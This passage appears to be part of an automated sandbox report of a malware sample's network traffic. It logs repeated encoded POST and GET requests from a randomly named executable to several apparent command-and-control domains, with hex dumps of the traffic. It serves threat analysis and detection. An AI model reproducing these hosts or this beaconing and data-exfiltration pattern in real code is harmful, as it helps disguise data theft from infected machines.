cfL4;desc="?proto=TCP&rtt=99818&min_rtt=99818&rtt_var=49909&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=747&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 9a 46 ba 1c b2 11 05 17 ba f1 04 a9 33 36 81 34 29 31 82 bd bd 54 0d 88 6b 97 ae 06 fe 7f ff 31 68 f3 e8 75 5d a1 65 43 1a b3 cb 9e 75 d7 76 70 8c 19 76 f1 16 08 e5 2b 44 f9 44 ea 0a fb 48 f3 72 cf 1c 32 27 8d 56 7d 2f ac d2 28 df f5 e2 4e ba c0 61 70 e1 2e 55 b3 6e 1b f5 89 c8 22 95 e5 a1 95 10 60 60 32 44 2e 0c 90 23 90 bb 9a de 33 1c 4e fb 2d 98 40 b0 b1 29 8e 0c 97 e4 38 90 9f 81 53 8a 09 26 33 30 08 f1 57 fc 5a f1 00 1e f7 54 ba 2b 02 00 00 0d 0a Data Ascii: aeA0Ea<@F364)1Tk1hu]eCuvpv+DDHr2'V}/(Nap.Un"``2D.#3N-@)8S&30WZT+
Apr 1, 2025 09:04:16.605211973 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49730	104.21.32.1	80	6292	C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe

Timestamp	Bytes transferred	Direction	Data
Apr 1, 2025 09:04:18.881954908 CEST	7004	OUT	POST /n61y/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 6479 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.sigaque.today Origin: http://www.sigaque.today Referer: http://www.sigaque.today/n61y/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 75 38 53 30 59 64 3d 4d 4d 4e 2f 52 4e 35 57 46 46 6b 46 66 4b 34 61 6f 4e 4f 41 47 39 4b 67 53 47 4f 48 37 61 7a 56 61 53 51 77 36 30 2b 48 43 42 50 5a 50 79 67 69 63 4e 37 52 41 64 62 6f 46 65 4f 65 72 70 56 4d 36 35 38 65 58 44 61 45 33 31 50 33 43 72 75 53 54 78 48 51 49 70 32 47 31 56 70 48 44 47 78 64 51 42 31 47 35 39 6a 61 70 30 2b 71 50 4f 48 6d 41 68 69 47 72 69 74 6d 75 42 39 64 49 62 2f 73 2f 55 75 36 32 69 41 57 39 4e 7a 41 72 57 2b 31 6d 42 44 66 57 75 4c 50 42 6c 55 46 66 6a 75 4e 63 2b 4c 34 2f 70 70 57 39 65 72 67 75 31 59 4e 2f 55 64 4c 63 32 46 63 42 2f 45 4e 4c 6d 72 61 4a 6f 39 47 65 33 71 56 61 65 7a 6c 45 58 41 59 53 50 35 71 4d 51 4b 4a 63 76 69 5a 71 43 6b 38 77 49 63 62 51 48 62 2b 2b 68 6c 2f 54 57 71 47 62 57 42 4d 32 58 6c 2f 30 57 4b 4d 59 67 33 64 42 2f 36 6c 49 33 46 68 51 2f 33 5a 36 57 48 72 61 2b 51 67 61 65 47 56 59 78 50 6e 79 61 2f 59 4d 4e 72 30 6b 4e 6c 38 6f 4e 66 38 65 44 5a 37 39 38 68 4c 66 6c 71 30 36 62 61 54 36 35 69 43 39 41 6e 5a 72 6a 37 37 68 47 30 [TRUNCATED] Data Ascii: u8S0Yd=MMN/RN5WFFkFfK4aoNOAG9KgSGOH7azVaSQw60+HCBPZPygicN7RAdboFeOerpVM658eXDaE31P3CruSTxHQIp2G1VpHDGxdQB1G59jap0+qPOHmAhiGritmuB9dIb/s/Uu62iAW9NzArW+1mBDfWuLPBlUFfjuNc+L4/ppW9ergu1YN/UdLc2FcB/ENLmraJo9Ge3qVaezlEXAYSP5qMQKJcviZqCk8wIcbQHb++hl/TWqGbWBM2Xl/0WKMYg3dB/6lI3FhQ/3Z6WHra+QgaeGVYxPnya/YMNr0kNl8oNf8eDZ798hLflq06baT65iC9AnZrj77hG0LsoOscd8X4pUM7XPqTR2fs9KNPDxMNVYEAuXwT/VqfbhP/Gb+7sKsvqsuDNJNHnJ49vsAowz+M14MpKlyrwdJ6u5cqq+pg7oWhXajbf/eEy3dPmPOk4T0A5bmVSqn64enQP7WhnQtsKLPcQ/23wKwwMVJTkvddJpLaoYqjO/k2LhP85B48t3JHO1sOP/I5nIcc28dqAC1Z5nuuGQ3XNFEbYvFI9OK3uQBNC3/lt3J/Vcl5+yUn3RnwwuilUDHZXmXxpmGbK7/5op2Ry3aUcfPCLSPGnqx4FoutBHBPkE9g/R9TJAqAXDX98YM14yGS0UzYgNx+t33rE2UO38FcXTtGGI1tmMDs7nVWhtzLg0vkxz5ggTvh3jWp7Co3/yWCU7vJAQYRGY1BP3X/fwqlYr8vnBknUyh4FvVALZHWC2miXqdwceMPQ/0+uOihmp4WJpjw8p/WgI3L1UUrG6u6bpzz/WPuNrgDDhxZiPFxCQxB10BxRc4Jay9zmrIYfHT6cTm+N7cxtopp09KoRu/v+b5bvAeemAfOLfRn34vcsm9AhgQi9SoqBWVJgwAZHGu+g/qacWQUpaJg9ncJtZqzDjQBqima6B9z6OwM9PUwOxXbgv65h2vsG7voZ5pPEs5Xy0VhLx8P/AcPLZy99/olRMtqLPwOJ9JfDob/ [TRUNCATED]
Apr 1, 2025 09:04:19.255834103 CEST	1008	IN	HTTP/1.1 404 Not Found Date: Tue, 01 Apr 2025 07:04:19 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3cggA0wmiT0jKnh6xIWBkdquHQN95AU13jnShtu5EqCnP4LpDy6FrTZNa6Kz%2FBywhAsuRztA89LlRQ1w%2BVe8S73S9p9FJubGSjopAfGdnsbNbK%2FYF%2FVAJC6Twhvq32RS7JA3WQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92963b4e4df88c47-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=98150&min_rtt=98150&rtt_var=49075&sent=2&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7004&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 9a 46 ba 1c b2 11 05 17 ba f1 04 a9 33 36 81 34 29 31 82 bd bd 54 0d 88 6b 97 ae 06 fe 7f ff 31 68 f3 e8 75 5d a1 65 43 1a b3 cb 9e 75 d7 76 70 8c 19 76 f1 16 08 e5 2b 44 f9 44 ea 0a fb 48 f3 72 cf 1c 32 27 8d 56 7d 2f ac d2 28 df f5 e2 4e ba c0 61 70 e1 2e 55 b3 6e 1b f5 89 c8 22 95 e5 a1 95 10 60 60 32 44 2e 0c 90 23 90 bb 9a de 33 1c 4e fb 2d 98 40 b0 b1 29 8e 0c 97 e4 38 90 9f 81 53 8a 09 26 33 30 08 f1 57 fc 5a f1 00 1e f7 54 ba 2b 02 00 00 0d 0a Data Ascii: aeA0Ea<@F364)1Tk1hu]eCuvpv+DDHr2'V}/(Nap.Un"``2D.#3N-@)8S&30WZT+
Apr 1, 2025 09:04:19.255867004 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49731	104.21.32.1	80	6292	C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe

Timestamp	Bytes transferred	Direction	Data
Apr 1, 2025 09:04:21.556158066 CEST	460	OUT	GET /n61y/?u8S0Yd=BOlfS7N9ZWkGRIMQvtCcANCNb3qAqq3eSjZAzliNIDKZHnAeT7/5dfTbZtimq+dx8K4CQjPcymznAMXPWSrBL6eCiEJPRGlRejti0K3snW3AOM+4UQW8vy0=&rvNTa=V4hx68Jpk HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Connection: close Host: www.sigaque.today User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Apr 1, 2025 09:04:21.919503927 CEST	1031	IN	HTTP/1.1 404 Not Found Date: Tue, 01 Apr 2025 07:04:21 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pKnbKusfi5Uq1hNmMg%2BzEHhJaNjSL4c6KRIa6PV8rs3vnSSBJZ3EDxr4Y4OyG42xVFgtSPxtM9aj0K%2FkSpOQ3BfFYbrM%2FH%2B2bQqK3O%2FQmozbXWz0sUZiRCChMJNXoCe7IW3TSQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92963b5f0bb81819-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=97244&min_rtt=97244&rtt_var=48622&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=460&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 32 62 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c Data Ascii: 22b<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page --><
Apr 1, 2025 09:04:21.919523001 CEST	336	IN	Data Raw: 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 Data Ascii: !-- a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome f
Apr 1, 2025 09:04:21.919533014 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49732	47.83.1.90	80	6292	C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe

Timestamp	Bytes transferred	Direction	Data
Apr 1, 2025 09:04:53.818047047 CEST	721	OUT	POST /0vwm/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 203 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.cruycq.info Origin: http://www.cruycq.info Referer: http://www.cruycq.info/0vwm/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 75 38 53 30 59 64 3d 76 75 78 71 4d 6b 4d 67 54 34 71 68 39 55 66 46 56 42 49 2f 32 54 74 41 58 47 4d 41 7a 46 4a 6a 65 35 72 5a 74 76 70 45 76 41 47 6f 55 48 59 6e 77 33 4b 45 48 79 4f 64 45 2f 48 65 5a 2b 37 30 33 6d 6e 77 77 35 54 79 71 6d 6a 76 4e 75 64 64 4d 63 71 35 61 5a 70 72 61 6c 6d 34 4a 2f 33 59 68 58 34 6b 4b 4d 4b 58 68 46 4c 6a 47 38 46 4c 62 77 77 4a 56 67 59 31 44 78 7a 41 42 67 62 76 2b 34 55 55 52 63 77 4d 57 62 64 56 4d 43 55 6d 48 69 5a 4d 4e 46 50 57 72 35 2f 77 78 58 41 76 74 6b 45 6a 49 77 38 46 6c 2f 7a 4b 46 44 6a 4c 63 69 47 2b 39 59 5a 47 72 4e 7a 52 63 61 58 71 39 67 3d 3d Data Ascii: u8S0Yd=vuxqMkMgT4qh9UfFVBI/2TtAXGMAzFJje5rZtvpEvAGoUHYnw3KEHyOdE/HeZ+703mnww5TyqmjvNuddMcq5aZpralm4J/3YhX4kKMKXhFLjG8FLbwwJVgY1DxzABgbv+4UURcwMWbdVMCUmHiZMNFPWr5/wxXAvtkEjIw8Fl/zKFDjLciG+9YZGrNzRcaXq9g==
Apr 1, 2025 09:04:54.638560057 CEST	114	IN	HTTP/1.1 404 Server: nginx/1.18.0 Date: Tue, 01 Apr 2025 07:04:54 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49733	47.83.1.90	80	6292	C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe

Timestamp	Bytes transferred	Direction	Data
Apr 1, 2025 09:04:56.647674084 CEST	741	OUT	POST /0vwm/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 223 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.cruycq.info Origin: http://www.cruycq.info Referer: http://www.cruycq.info/0vwm/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 75 38 53 30 59 64 3d 76 75 78 71 4d 6b 4d 67 54 34 71 68 76 6b 76 46 51 6d 55 2f 7a 7a 74 42 4c 57 4d 41 35 6c 49 4c 65 35 33 5a 74 75 39 55 76 79 69 6f 58 6d 6f 6e 78 31 79 45 47 79 4f 64 63 76 48 58 45 75 36 32 33 6d 72 43 77 39 62 79 71 6d 48 76 4e 76 74 64 4e 72 32 36 49 35 70 74 63 6c 6e 65 48 66 33 59 68 58 34 6b 4b 4d 4f 78 68 46 54 6a 47 4d 56 4c 61 54 6f 57 55 67 59 30 45 78 7a 41 46 67 62 72 2b 34 56 44 52 5a 51 71 57 5a 56 56 4d 47 51 6d 47 7a 5a 4e 44 46 50 71 76 35 2b 45 35 6d 6b 6a 71 48 6b 69 4c 67 39 6a 6a 66 33 4a 45 46 75 52 4e 54 6e 70 76 59 39 31 32 4b 36 6c 52 5a 71 6a 6d 71 73 79 62 58 6b 74 4b 76 30 4f 76 2b 51 6a 41 39 35 6d 79 71 4d 3d Data Ascii: u8S0Yd=vuxqMkMgT4qhvkvFQmU/zztBLWMA5lILe53Ztu9UvyioXmonx1yEGyOdcvHXEu623mrCw9byqmHvNvtdNr26I5ptclneHf3YhX4kKMOxhFTjGMVLaToWUgY0ExzAFgbr+4VDRZQqWZVVMGQmGzZNDFPqv5+E5mkjqHkiLg9jjf3JEFuRNTnpvY912K6lRZqjmqsybXktKv0Ov+QjA95myqM=
Apr 1, 2025 09:04:57.658437014 CEST	114	IN	HTTP/1.1 404 Server: nginx/1.18.0 Date: Tue, 01 Apr 2025 07:04:57 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49734	47.83.1.90	80	6292	C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe

Timestamp	Bytes transferred	Direction	Data
Apr 1, 2025 09:04:59.477433920 CEST	6998	OUT	POST /0vwm/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 6479 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.cruycq.info Origin: http://www.cruycq.info Referer: http://www.cruycq.info/0vwm/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 75 38 53 30 59 64 3d 76 75 78 71 4d 6b 4d 67 54 34 71 68 76 6b 76 46 51 6d 55 2f 7a 7a 74 42 4c 57 4d 41 35 6c 49 4c 65 35 33 5a 74 75 39 55 76 79 71 6f 58 55 67 6e 78 53 6d 45 46 79 4f 64 43 2f 48 53 45 75 36 33 33 6d 7a 47 77 39 58 49 70 56 7a 76 4d 39 46 64 4b 49 65 36 57 5a 70 74 56 46 6d 32 44 66 33 6b 68 57 49 67 4b 4d 4b 78 68 45 2f 6a 47 4d 56 4c 61 41 77 57 57 77 59 32 45 78 7a 30 50 41 62 76 2b 34 55 55 52 63 6f 36 57 4a 31 56 56 69 30 6d 42 42 68 4e 4c 46 50 53 69 5a 2b 63 35 6d 59 67 71 48 39 31 4c 68 55 34 67 72 72 4a 45 69 4c 34 49 54 2f 67 39 70 34 72 74 35 4f 67 5a 37 43 49 6a 4c 6b 39 57 30 6b 73 61 39 67 78 6a 66 35 70 45 63 31 6d 6e 4f 6e 51 5a 4a 33 31 61 36 2f 34 4b 4e 54 72 36 2b 57 4b 52 59 75 30 6f 43 30 55 55 41 61 67 4a 52 7a 71 45 53 48 6d 65 30 33 48 2b 6f 6a 2f 6d 49 50 51 59 6b 65 72 4b 70 4c 76 61 6a 41 54 55 4f 53 63 6a 79 4c 63 45 31 4e 78 45 36 76 71 68 6e 4e 44 42 51 34 35 6f 55 58 43 4f 4a 55 6c 57 58 45 67 41 39 32 6d 77 6c 52 71 45 65 2f 38 72 45 32 2b 71 68 48 [TRUNCATED] Data Ascii: u8S0Yd=vuxqMkMgT4qhvkvFQmU/zztBLWMA5lILe53Ztu9UvyqoXUgnxSmEFyOdC/HSEu633mzGw9XIpVzvM9FdKIe6WZptVFm2Df3khWIgKMKxhE/jGMVLaAwWWwY2Exz0PAbv+4UURco6WJ1VVi0mBBhNLFPSiZ+c5mYgqH91LhU4grrJEiL4IT/g9p4rt5OgZ7CIjLk9W0ksa9gxjf5pEc1mnOnQZJ31a6/4KNTr6+WKRYu0oC0UUAagJRzqESHme03H+oj/mIPQYkerKpLvajATUOScjyLcE1NxE6vqhnNDBQ45oUXCOJUlWXEgA92mwlRqEe/8rE2+qhHfbzbfZEBIkoiiuFDxl+k8XC+l79LS2HzPsKIc3riheVSR8DylI3akTZ4m/AoTgrzK+T+Cx9KYDs2IH6aa/aK7lr7ckSpL1OZySAwY2XSGeOPhhOXFSB+osdH87v9MJrIt6XkZ++070e6TnbuqyLDyU9K+KpXChOQasFEkTS14Yj9RSFWYqgXbIEpZefQV5bd4GJaxUz3Ta6fJTH4gahW9LON9EjwXD6IO6VQDhpBVennjCrNAW4fiQ6/psexE+kRISTLt2mwZl4woEohiKo7f5Om68LCLerhyjq+C6bCjfTR8jCPxTq38aejbkJiwXBdBNY6H8f2VaDhGVgeCyNuwM0q/2IFPkwkWkWsufUt9kKyNwmQYkT8in0IYc8Hm6v1mci+3ccWZ0rvLqEi6fHqa7HvxsihEA3m0tYtmR3c9r+P7RgEsoBRwabg078TwnXvvQ6KJ1dYQNZPOOJXi5rDh9sJrysO6/folKue069kOujVG5vh9LWRizW5MiAoBI2IrCnyBS6bx9z6t+zq1VOvw/8ZuN8koBpDUt6boe+XvsPGq1eYGkULK9KpAST3nzlyOFhfpWoWBchX7FQpO0DLafGAg72g2FrdDPSPOQ10jfIcyfEUBnCLkIb2P+Kem4KjPzoBjlMnk8zAKmXZc/Im6aTX963TV3g2sO [TRUNCATED]
Apr 1, 2025 09:05:00.518054962 CEST	114	IN	HTTP/1.1 404 Server: nginx/1.18.0 Date: Tue, 01 Apr 2025 07:05:00 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49735	47.83.1.90	80	6292	C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe

Timestamp	Bytes transferred	Direction	Data
Apr 1, 2025 09:05:02.323060036 CEST	458	OUT	GET /0vwm/?u8S0Yd=isZKPUheR62D1kSpREB90xs9KlsJxVI6aq2kqe9MkRSuWx05zEGLQQrQabjISr6l0kvk8u7/qEvONJ0dI6qocJ4rJlXzX8i5iUc6JOqvlFi4G71MGy8zaxE=&rvNTa=V4hx68Jpk HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Connection: close Host: www.cruycq.info User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Apr 1, 2025 09:05:03.321115971 CEST	114	IN	HTTP/1.1 404 Server: nginx/1.18.0 Date: Tue, 01 Apr 2025 07:05:03 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49736	47.83.1.90	80	6292	C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe

Timestamp	Bytes transferred	Direction	Data
Apr 1, 2025 09:05:17.125931978 CEST	721	OUT	POST /iwsk/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 203 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.qzsazi.info Origin: http://www.qzsazi.info Referer: http://www.qzsazi.info/iwsk/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 75 38 53 30 59 64 3d 6e 79 44 46 61 41 4a 6c 6e 76 2f 35 2b 47 70 73 6f 4b 78 36 53 51 38 49 66 2b 53 53 41 7a 33 6b 77 6a 76 33 78 49 30 6d 43 74 35 4a 67 6c 57 6b 46 73 2b 64 52 33 76 56 66 59 56 77 4e 2f 76 44 6d 45 64 4d 49 63 77 51 4d 5a 51 35 30 4c 4a 4b 65 43 6f 6f 39 33 65 50 63 31 42 2f 58 43 48 4b 37 30 66 35 62 39 4e 67 5a 6e 70 69 6b 57 43 48 37 4f 32 45 63 70 66 56 30 4d 2b 72 70 4e 4c 78 68 4f 63 56 58 4d 42 7a 31 6e 44 5a 37 30 34 33 74 37 61 2f 6e 63 6f 45 75 32 55 4e 48 4e 77 53 69 4c 36 65 2b 73 32 6d 43 61 34 47 35 4e 35 75 34 53 68 6a 45 31 34 33 74 31 6b 67 45 2b 32 46 42 67 3d 3d Data Ascii: u8S0Yd=nyDFaAJlnv/5+GpsoKx6SQ8If+SSAz3kwjv3xI0mCt5JglWkFs+dR3vVfYVwN/vDmEdMIcwQMZQ50LJKeCoo93ePc1B/XCHK70f5b9NgZnpikWCH7O2EcpfV0M+rpNLxhOcVXMBz1nDZ7043t7a/ncoEu2UNHNwSiL6e+s2mCa4G5N5u4ShjE143t1kgE+2FBg==
Apr 1, 2025 09:05:18.088798046 CEST	114	IN	HTTP/1.1 404 Server: nginx/1.18.0 Date: Tue, 01 Apr 2025 07:05:17 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49737	47.83.1.90	80	6292	C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe

Timestamp	Bytes transferred	Direction	Data
Apr 1, 2025 09:05:19.959129095 CEST	741	OUT	POST /iwsk/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 223 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.qzsazi.info Origin: http://www.qzsazi.info Referer: http://www.qzsazi.info/iwsk/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 75 38 53 30 59 64 3d 6e 79 44 46 61 41 4a 6c 6e 76 2f 35 38 6e 35 73 76 72 78 36 5a 51 38 48 44 75 53 53 50 54 33 6f 77 6a 6a 33 78 4a 78 39 43 2f 64 4a 6a 48 2b 6b 44 5a 43 64 53 33 76 56 58 34 56 31 53 50 76 55 6d 45 52 69 49 64 63 51 4d 59 77 35 30 50 46 4b 65 7a 6f 72 38 6e 65 4a 61 31 42 78 61 69 48 4b 37 30 66 35 62 39 49 31 5a 6e 78 69 6b 6d 79 48 35 72 61 46 56 4a 66 55 31 4d 2b 72 74 4e 4b 34 68 4f 64 77 58 4a 70 5a 31 6b 37 5a 37 31 49 33 74 71 61 34 74 63 70 50 74 47 55 59 44 59 46 4c 6b 70 2f 33 32 2f 61 57 49 70 35 6a 31 72 30 30 70 6a 41 30 57 31 63 45 77 79 74 55 4a 39 4c 4d 61 67 50 5a 63 6e 4d 6a 4a 41 55 4b 61 41 68 6a 2b 62 58 59 57 47 59 3d Data Ascii: u8S0Yd=nyDFaAJlnv/58n5svrx6ZQ8HDuSSPT3owjj3xJx9C/dJjH+kDZCdS3vVX4V1SPvUmERiIdcQMYw50PFKezor8neJa1BxaiHK70f5b9I1ZnxikmyH5raFVJfU1M+rtNK4hOdwXJpZ1k7Z71I3tqa4tcpPtGUYDYFLkp/32/aWIp5j1r00pjA0W1cEwytUJ9LMagPZcnMjJAUKaAhj+bXYWGY=
Apr 1, 2025 09:05:20.805785894 CEST	114	IN	HTTP/1.1 404 Server: nginx/1.18.0 Date: Tue, 01 Apr 2025 07:05:20 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49738	47.83.1.90	80	6292	C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe

Timestamp	Bytes transferred	Direction	Data
Apr 1, 2025 09:05:22.833292961 CEST	6998	OUT	POST /iwsk/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 6479 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.qzsazi.info Origin: http://www.qzsazi.info Referer: http://www.qzsazi.info/iwsk/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 75 38 53 30 59 64 3d 6e 79 44 46 61 41 4a 6c 6e 76 2f 35 38 6e 35 73 76 72 78 36 5a 51 38 48 44 75 53 53 50 54 33 6f 77 6a 6a 33 78 4a 78 39 43 2f 56 4a 67 30 47 6b 46 4b 71 64 54 33 76 56 5a 59 56 30 53 50 76 4a 6d 45 5a 6d 49 64 41 41 4d 50 67 35 31 63 74 4b 5a 51 41 72 30 33 65 4a 53 56 42 39 65 69 48 41 37 79 2f 39 62 39 4d 31 5a 6b 31 69 6b 6d 79 48 34 2b 32 46 63 35 66 57 31 4d 2b 44 6b 74 4c 78 68 4f 63 56 58 49 74 4a 31 56 62 5a 36 56 59 33 69 34 79 34 75 38 70 4e 6f 47 56 64 44 59 42 4b 6b 6f 58 46 32 36 2b 67 49 62 68 6a 6d 4d 74 62 36 53 63 41 4e 6b 6b 63 73 